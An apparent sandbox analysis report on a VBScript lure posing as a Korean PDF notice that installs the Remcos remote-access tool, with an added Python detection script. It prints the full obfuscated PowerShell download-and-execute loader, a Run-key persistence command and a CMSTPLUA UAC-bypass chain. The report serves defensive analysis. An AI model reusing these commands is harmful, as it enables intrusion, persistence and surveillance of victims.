File name: (전사공지용) 24년 안전작업허가 기준 안내 (240415)·pdf.vbs

(Korean; roughly "[Company-wide notice] 2024 safe-work-permit standards guidance (240415)". The "·pdf" before the real ".vbs" extension is a middle-dot double-extension lure meant to read as a PDF attachment; the file is a VBScript.)

Full analysis: https://app.any.run/tasks/22a829fc-c7e5-4db0-b3cf-4c24a348de45
Verdict: Malicious activity
Threats:

Remcos is a commercially distributed remote administration and surveillance tool that has been widely observed in unauthorized deployments, where threat actors use it to perform remote actions on compromised machines. It is actively maintained by its vendor, with new versions and feature updates released on a frequent, near-monthly basis.

Analysis date: April 14, 2024, 22:56:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: remcos
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: 6E74F3450B6A5719B9E71F6EA32295CE
SHA1: 790344F4225B4A5E904F3E06DE6AAC6FA9FE58D5
SHA256: 6C0C6D699BE7442DCD1E34507AC5F9103FCF2A220B032E2E7159805C820A0483
SSDEEP: 6144:ixRLaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkPX:0GInOiOi9PIM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Gets path to any of the special folders (SCRIPT)

      • wscript.exe (PID: 3992)
    • Opens a text file (SCRIPT)

      • wscript.exe (PID: 3992)
    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 3992)
    • Unusual connection from system programs

      • wscript.exe (PID: 3992)
    • Changes the autorun value in the registry

      • reg.exe (PID: 1844)
    • REMCOS has been detected

      • wab.exe (PID: 1900)
    • Known privilege escalation attack

      • dllhost.exe (PID: 1540)
  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 3992)
      • powershell.exe (PID: 2856)
      • wab.exe (PID: 1900)
    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 3992)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 3992)
    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 3992)
    • Base64-obfuscated command line is found

      • wscript.exe (PID: 3992)
      • powershell.exe (PID: 2856)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3992)
      • powershell.exe (PID: 2856)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3992)
    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 3992)
      • powershell.exe (PID: 2856)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)
      • wab.exe (PID: 1900)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 2856)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 2072)
    • Unusual connection from system programs

      • powershell.exe (PID: 2856)
    • Reads settings of System Certificates

      • wab.exe (PID: 1900)
    • Application launched itself

      • powershell.exe (PID: 2856)
    • Reads security settings of Internet Explorer

      • wab.exe (PID: 1900)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2488)
    • Checks Windows Trust Settings

      • wab.exe (PID: 1900)
  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 3992)
      • powershell.exe (PID: 2856)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 2856)
      • powershell.exe (PID: 2072)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2072)
    • Checks supported languages

      • wab.exe (PID: 1900)
      • wab.exe (PID: 2128)
    • Checks proxy server information

      • wab.exe (PID: 1900)
    • Reads the software policy settings

      • wab.exe (PID: 1900)
    • Reads the machine GUID from the registry

      • wab.exe (PID: 1900)
      • wab.exe (PID: 2128)
    • Reads product name

      • wab.exe (PID: 1900)
    • Creates files or folders in the user directory

      • wab.exe (PID: 1900)
    • Reads Environment values

      • wab.exe (PID: 1900)
    • Reads the computer name

      • wab.exe (PID: 1900)
      • wab.exe (PID: 2128)
    • Checks transactions between databases Windows and Oracle

      • wab.exe (PID: 1900)
    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 1540)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Malware configuration: no data (nothing extracted by the sandbox).
Total processes: 52
Monitored processes: 10
Malicious processes: 5
Suspicious processes: 1

Behavior graph (reconstructed from the Parent process column of the process table below; "no specs" marks nodes the report lists without detail)

explorer.exe
└─ wscript.exe (3992)                         script host, MEDIUM integrity
   └─ powershell.exe (2856)                   first stage
      ├─ powershell.exe (2072)                second stage, started by 2856 ("Application launched itself")
      ├─ cmd.exe (1348, 2832)                 no specs; one cmd.exe per PowerShell instance, parent listed only as powershell.exe
      └─ wab.exe (1900)                       Windows Contacts, MEDIUM, REMCOS detected; parent listed only as powershell.exe
         └─ cmd.exe (2488)                    no specs
            └─ reg.exe (1844)                 REG ADD ...\CurrentVersion\Run "Whins"
svchost.exe
└─ dllhost.exe (1540, CMSTPLUA)               COM Surrogate, HIGH integrity, "Known privilege escalation attack"
   └─ wab.exe (2128)                          no specs, HIGH integrity, exit code 1
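The chain above is the kind of thing that should fall out of a few process-tree and registry rules rather than a manual read. What follows is an added example written for this page, not ANY.RUN's code and not the sample's: it replays this report's process table as constructed events (PID, image, parent image and integrity level as listed; parent PIDs the report does not give are not used, and the two PowerShell command lines are truncated), then runs five checks over them, including parsing the REG ADD line that reg.exe (PID 1844) executed and expanding its REG_EXPAND_SZ data the way the logon shell would. The report does not show what %Protokollering29% holds, so the USER_ENV mapping that points it at powershell.exe is an assumption made only so the expansion step has something to resolve.

```python
import re
from dataclasses import dataclass

CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"   # CMSTPLUA COM object hosted by dllhost.exe
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
STANDARD_ENV = {"SYSTEMROOT", "WINDIR", "SYSTEMDRIVE", "PROGRAMFILES", "PROGRAMFILES(X86)", "PROGRAMDATA",
                "APPDATA", "LOCALAPPDATA", "USERPROFILE", "TEMP", "TMP", "PUBLIC", "COMMONPROGRAMFILES"}
PS_HALLMARKS = ("-w 1", "-windowstyle hidden", "get-itemproperty", "hkcu:", "iex", "invoke-expression",
                "frombase64string")

# REG ADD line exactly as the process table shows it for reg.exe (PID 1844).
REG_ADD = r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Whins" /t REG_EXPAND_SZ /d "%Protokollering29% -w 1 $Tlle=(Get-ItemProperty -Path 'HKCU:\uforligeligt\').Anisene;%Protokollering29% ($Tlle)"'''

# ASSUMPTION: the report never shows the value of %Protokollering29%; a user-scope variable pointing
# at powershell.exe is assumed here so that the expansion step below has something to resolve.
USER_ENV = {"Protokollering29": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"}


@dataclass
class Proc:
    pid: int
    image: str
    parent_image: str
    integrity: str
    cmdline: str


# Constructed from this report's process table; the PowerShell command lines are truncated here.
EVENTS = [
    Proc(3992, "wscript.exe", "explorer.exe", "MEDIUM",
         r'"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\(전사공지용) 24년 안전작업허가 기준 안내 (240415)·pdf.vbs"'),
    Proc(2856, "powershell.exe", "wscript.exe", "MEDIUM",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;..."'),
    Proc(2072, "powershell.exe", "powershell.exe", "MEDIUM",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;..."'),
    Proc(1348, "cmd.exe", "powershell.exe", "MEDIUM",
         r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo f7f81a39-5f63-5b42-9efd-1f13b5431005"'),
    Proc(1900, "wab.exe", "powershell.exe", "MEDIUM", r'"C:\Program Files\windows mail\wab.exe"'),
    Proc(2488, "cmd.exe", "wab.exe", "MEDIUM", r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD),
    Proc(1844, "reg.exe", "cmd.exe", "MEDIUM", REG_ADD),
    Proc(1540, "dllhost.exe", "svchost.exe", "HIGH", r"C:\Windows\system32\DllHost.exe /Processid:" + CMSTPLUA_CLSID),
    Proc(2128, "wab.exe", "dllhost.exe", "HIGH", r'"C:\Program Files\windows mail\wab.exe" '),
]

REG_ADD_RE = re.compile(
    r'REG\s+ADD\s+(?P<key>\S+).*?/v\s+"?(?P<name>[^"\s]+)"?.*?/t\s+(?P<type>\S+).*?/d\s+"(?P<data>.*)"\s*$',
    re.IGNORECASE | re.DOTALL)


def analyze_run_value(cmdline: str, user_env: dict):
    """Parse a REG ADD aimed at a Run key; flag %VAR% indirection and PowerShell hallmarks in the data."""
    m = REG_ADD_RE.search(cmdline)
    if not m or "currentversion\\run" not in m["key"].lower():
        return None
    data = m["data"]
    refs = re.findall(r"%([^%\s]+)%", data)
    unknown = sorted({r for r in refs if r.upper() not in STANDARD_ENV})   # env vars Windows does not define
    expanded = data
    if m["type"].upper() == "REG_EXPAND_SZ":          # the shell expands %VAR% at logon; do the same
        expanded = re.sub(r"%([^%\s]+)%", lambda mm: user_env.get(mm.group(1), mm.group(0)), data)
    hallmarks = [h for h in PS_HALLMARKS if h in data.lower()]
    return {"key": m["key"], "name": m["name"], "type": m["type"], "unknown_env_refs": unknown,
            "expanded": expanded, "hallmarks": hallmarks, "suspicious": bool(unknown or hallmarks)}


def triage(events: list) -> list:
    """Run the process-tree and persistence checks; return one finding dict per hit."""
    findings = []
    cmstplua_hosts = {p.pid for p in events
                      if p.image == "dllhost.exe" and CMSTPLUA_CLSID.lower() in p.cmdline.lower()}
    for p in events:
        if p.image == "powershell.exe" and p.parent_image in SCRIPT_HOSTS:
            findings.append({"rule": "script_host_spawns_powershell", "pid": p.pid})
        if p.image == "wab.exe" and p.parent_image == "powershell.exe":   # Windows Contacts as a PowerShell child
            findings.append({"rule": "powershell_spawns_wab", "pid": p.pid})
        if p.parent_image == "dllhost.exe" and cmstplua_hosts and p.integrity == "HIGH":
            findings.append({"rule": "cmstplua_uac_bypass", "pid": p.pid, "via": sorted(cmstplua_hosts)})
        if p.image == "reg.exe":
            run = analyze_run_value(p.cmdline, USER_ENV)
            if run and run["suspicious"]:
                findings.append({"rule": "run_key_indirect_powershell", "pid": p.pid, "run_value": run})
    levels = {}
    for p in events:
        levels.setdefault(p.image, set()).add(p.integrity)
    for image, seen in levels.items():
        if {"MEDIUM", "HIGH"} <= seen:   # same binary at both levels: elevation happened inside this chain
            findings.append({"rule": "same_image_medium_and_high", "image": image})
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

The Run-key rule is the one worth keeping around: a REG_EXPAND_SZ autorun whose first token is an environment variable that Windows itself does not define, and whose remainder reads a registry value and hands it back to the same variable for execution, leaves no script file on disk to scan. On a live host the two things to pull next are HKCU\Environment (for the variable's value) and HKCU\uforligeligt (for the payload the Run value reads).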

Process information (one entry per monitored process: PID, CMD, Path, Parent process, then user, integrity level, description, exit code, version and loaded modules)
PID: 1348
CMD: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo f7f81a39-5f63-5b42-9efd-1f13b5431005"
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1540
CMD: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
Path: C:\Windows\System32\dllhost.exe
Parent process: svchost.exe
Note: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} is the CLSID of the CMSTPLUA COM object that the behavior graph names. The surrogate runs at HIGH integrity, is the process the report flags as "Known privilege escalation attack", and its child wab.exe (PID 2128) inherits that level.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1844
CMD: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Whins" /t REG_EXPAND_SZ /d "%Protokollering29% -w 1 $Tlle=(Get-ItemProperty -Path 'HKCU:\uforligeligt\').Anisene;%Protokollering29% ($Tlle)"
Path: C:\Windows\System32\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 1900
CMD: "C:\Program Files\windows mail\wab.exe"
Path: C:\Program Files\windows mail\wab.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\mshtml.dll
c:\program files\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
PID: 2072
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. 
Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegulerlFilm.tro ThronibKli ikaapavingslPeridio:DetrudiVWaflibdiTrunkserJunke.egUdmundeiRundkinn H regea Strengl BreastlSatsensyVisumhy= Frif,n$Fatho aCLavritsa HeinerrHier.magDomineeoHjttalelTornskai 
Lum,ernBestteleP,lleeor Rest,a.D.uglcosAcinetapAfskedslNecrophiSuperfatBiplans(Hem gen$TrnjbrtCUnkerchoFuldbefnRabbites LilithtCelluliaKlagerebIso.iazlCullende frdigesSystemis Akkli.)moujiks ');$Cargoliner=$Virginally[0];Dentagra176 (Rekordjagt 'Ell.kra$BavianhgSansninl,verdazoPa alleb Ac,ievaFjerdral For,se: sisyfoTFjortenrLevemuliOutspartStjko tu,isammebUnderboeSkolemerTilt gec AlgkiruSurfperlFu.ionsasalutatrleik.sg= VaertsNAntropoeFnike.dwDummere-E peditOTillavebOrchiocjRescoreeSpyttebc.ippingtD mogra KromgarS Audiomy alaxisSufeismtP,eudonedecurvemHusband.Epap phNLinkx.peUnintuitMisimag.Porto,rWVinkelse BrantsbUsigtbaComstninl Lunterisa.fundeCiviestn HypopytTric nn ');Dentagra176 (Rekordjagt 'Ejendom$NdkcaudTAm.ulanrTotalisi Str pntAlexiusuReprescb,estsigeMalodorr Ne trac,etleheuGulfyhilIntendeaDittychrScrideu.Schesi HCh,ndroeBreatheaUngdomsdCycloheeFractiorBesi desPastaen[En,kter$BoltheaRCobbl suAfgangsbLgelf ey TilvejsM,sshap] Deemph=Orthoxa$RhesuspS .asovnkEzaskrorRatinepiStraighvFlorineeForhast ');$Reinitializes=Rekordjagt 'HvilendTBestyrkrProdukti EtikettOverwa u VegetebCommunie FrstebrPulsi.nc Kriseru AntimelBe.eficaEstraderRegnska.BestrniDAlbigeno CuffspwReetablnNevaditl,ederalo TabelsaInfantedMisformFMicrospiAlkyderlgluti oeEftersl( Unfrac$ PrerecCDeludinaSn,ptagrRediss,gVamfontoperfectlExos eli ForstanDrvtyggeAugmentrTrretum, ,ernsb$ GibuseOValerolb pidsmulraindroiSk.pfulg Timneva Immor,tPlasmaciStall,noSocialbn Indskrs OronokrRoquelaeRkee.gltWarfaret Frsteiefalsn.nnFlerhedsTrach o) Skrive ';$Reinitializes=$Hypersensibility[1]+$Reinitializes;$Obligationsrettens=$Hypersensibility[0];Dentagra176 (Rekordjagt 'Weeken.$OvigermgMbelsnelHorizonoHydrobrbAraneinaTankstal Crumbl: regentS Bordvie EpicysmFormyndi ThyroafUndistoeThumbdir lyrehaoTidskrauShrinalskva,rat=Gangb.t(Driver.T .kolesePsychoasBolsjevtEfterve-NjagtigPGrimassa nsomsttUniversh Person Guelphi$ Mal ilOPeriferbYngelsolsvin,kdiFranc sgBundtekaFrems,it D,triniBssens oMetacarnDisa.ses Anti 
erPunctuaeAfskovntvsentlitIntertieNoalsnon Morel,s Aigudh)Perusal ');while (!$Semiferous) {Dentagra176 (Rekordjagt 'Virt.os$hypotymgDisk,ntlAnsvarsoSkruea,bArchdioaCursi gltourers:UdspredCHyperagu Kngtenr h,wlsbcE eterfuA,akolulAuthentiArbejdsotilhrsf1Spygatt6 Krydde0Fukssva= Gryrsa$LaegkartFjortenrShareowuPartikae Alvide ') ;Dentagra176 $Reinitializes;Dentagra176 (Rekordjagt 'DismissSJobb rit odbolaF,turisrSlikportInjust.-Betonb S UnderrlSprezzaeDeltidseLigularpAgtelse stim rn4Capr,ll ');Dentagra176 (Rekordjagt 'U.vener$ HalvdrgFl,mndelFret,oroRedimenbMagis,eaAnensrelOutbble:Sp.dbjnS ArsenieDi,ulgamReproofiO rrsaafUn corneReasc,nr Spl,ttoTo vinkuMetalans menis=Analyse(VideoplTHj.rtebeSidney,s Barkent Sneakb- C epepPAnchis aBorshtatHyperaehKomiker Jeelped$ PlagioOBlunderbInt.osplBaghussiSt.tssagPsycholaAboiteatSlyngeliPointtaoas.hyxin Tanny sEx,ortarTikampeePaatry,tSyphilotTrullsseVitessenPosturesPoetica) Lentic ') ;Dentagra176 (Rekordjagt 'Mokkasi$K.anategWindchelHftetseo Fag idbPrv tekaReddsmalSkonner: Prci eW Op rtcaPte,ygolRigsbyfkPistolaeIndbildn Demilie Spirit=Kise su$UnkamedgDdspatrlRamexdioFlamberbKra,tanaKatapu lNitroge:PrdikatP Offs.crKraftudeTrommesa Artf.lcUdgivelc E.domoutransprsexostott Taageroselvporm,eminereOrdlistdGrundst+G.seous+Unschol%,reyfly$Erudit,VTekstbeiKileskrrStopklogMirdscuiBlufrdinI,dhsteaBankerolSerenesl Exc,mmyEpicond.He.skabcLigasedoSnogehau machinn Deprivt Gabrie ') ;$Cargoliner=$Virginally[$Walkene];}Dentagra176 (Rekordjagt ' gascon$Bowlin,gL.ndkralPikketroSi imidb S,stemaBihulerlBedro.v:ragaersGUnpala.eRe,otednFrontoon BoligseBasketkmRdligs.rEm.ergeykildlumsOuttel.t minisyeUdpantntKulstof Opgoere=epil ch flawynuG .remfueAfm,grit Tytteb- BusrejCInoffenoGalinsonBubblelt UdvaeleArvem tnLimfabrtinsipid Br.gtfl$HavkattOTrachymbbeseemslDiphycei nwithgcoagu aaDecnetatPersistiNon.enuoatomiesn CiliassAflyssdrPaasknneVelve ptAnnoncetDispatee,ykelbunTrykmaasBjer ni ');Dentagra176 (Rekordjagt 'Chanc,a$Cytoplag Scu.lel Arianio 
coadapbViaduktaRem mbelUltra o:SendebuSFlersidhHeirleseImposanl Hoved l AntelapCoordinoUnprodut Triole Orbb.gr=Th,esub Stann,r[Um eledSfo drveyMinglinsYau snvtRe eptpeObservemAntipro. postaCSpildevoRafflesnGummyinvSyntakseRecleanrT xifyitFortrol]Dagsbef: Mia,ss:Li ieteFmissilfrGoddampoRm rsskmBinde,tBHandelsaSliderssPr,tosueSjalern6Fragmen4S.ovskaSmaltf.btFalklanrUudholdiTostaven Poonacg.rstatn(Beskytt$ BruserG Hnder.ePennysinEluat.dnBoblekae Fornemm Baandsr Forms yFodsveds riticatGaffelte feudaltUdludei)Unjusti ');Dentagra176 (Rekordjagt 'hommos,$Banefulg PerconlNonbrutoTilbagebPatr nia WaspnelAcaulou:HaandgrS ,lokbecMarengsrWeb tedaSlightewforlag.l Bvelsee revendrSto,tilsolivene Superma=Cor cob Viruci[ ObteneSCarmi iy IaomalsForcipatDeck.nge HydropmF.ldblo.SalvninTEsmarale Eph dsxTran,ort Kolleg. UdbudsEAnalysenve stancGainsaioCyborgsdTransfoiCounternMicrophg Smi hc]Vital t:P,ospho: .abellA PhaseaSMisfaitC ArbejdIFilipsgIG yceri.UnfavouGTroubleeMoto istsatir sS PolymetJulef,srLiniestiSy.sttynRataplagTil,rop(Sandkas$ Acce eSSudsmenh CymbideHirsti lPedagoglRhe.usnpJ risdiokundeaftTanekah) Vaagne ');Dentagra176 (Rekordjagt 'plancie$DynamitgThisllplPhascoloLunulaebUnder laClearehlb kldni:FllenesSAfskrkktAkutfunaNedska,tInterplicanop.cs s ndort,akshisi LgnernkPolemarpSensortrForsumpoAarligegDeckelsrDruideraLyknsknmGteskab2Spunkle6doerene=.yvinsa$TanzaniSCrzettec A.abolrBalanopaMisusedwUfordellForhippeDivisi rR,condis Paa ag.Udsendis HematouGaardrybColliersTraffictUvsentlr UrningiCi,ratenAshiestg Sumlog(Monstrs2Fourche9Deu,obr9 Phrase6Advoka,0Klukkes9 Uncial,D,ddelp3Dorritu0Ra.ioli1Recap t5 Filmsp6Ac tylb) Hjrnes ');Dentagra176 $Statistikprogram26;"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2128
CMD: "C:\Program Files\windows mail\wab.exe" 
Path: C:\Program Files\windows mail\wab.exe
Parent process: dllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Contacts
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\program files\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 2488
CMD: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Whins" /t REG_EXPAND_SZ /d "%Protokollering29% -w 1 $Tlle=(Get-ItemProperty -Path 'HKCU:\uforligeligt\').Anisene;%Protokollering29% ($Tlle)"
Path: C:\Windows\System32\cmd.exe
Parent process: wab.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2832
CMD: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo f7f81a39-5f63-5b42-9efd-1f13b5431005"
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2856
